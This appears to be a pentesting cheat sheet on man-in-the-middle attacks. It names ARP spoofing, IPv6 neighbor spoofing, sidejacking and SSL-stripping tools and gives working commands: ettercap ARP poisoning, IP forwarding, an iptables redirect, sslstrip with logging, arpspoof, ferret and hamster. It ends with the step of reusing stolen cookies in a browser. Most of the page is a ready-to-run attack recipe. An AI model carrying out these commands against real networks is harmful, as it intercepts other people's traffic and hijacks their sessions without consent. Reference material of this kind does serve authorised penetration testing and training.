MITM

ARP Spoofing (IPv4)
Cain and Abel (Windows)
​oxid.it - Cain & Abel​
Ettercap (Linux)
​GitHub - Ettercap/ettercap​
ettercap -TqM arp: remote /<gateway-ip>/ /<target-ip>/
Neighbor Advertisement Spoofing (IPv6)
Evil FOCA (Windows)
Evil Foca is a tool for security pentesters and auditors whose purpose it is to test security in IPv4 and IPv6 data networks.
Evil FOCA​
Sidejacking
Hamster/Ferret
Enable ip forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward
Modify ip tables for SSL Strip
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
Run SSL Strip
sslstrip -f -a -k -l 1000 -w /root/out.txt &
Enable ARP spoof
arpspoof -i eth0 <gateway>
Enable Ferret
ferret -i eth0
Start hamster
hamster
-> Use stolen cookies with e.g. FireFox Web Developer Addon -> Add Cookies
Firesheep
A Firefox extension that demonstrates HTTP session hijacking attacks.
GitHub - codebutler/firesheep​
SSLStrip
A tool for exploiting Moxie Marlinspike's SSL "stripping" attack.
GitHub - moxie0/sslstrip​

Last modified 1yr ago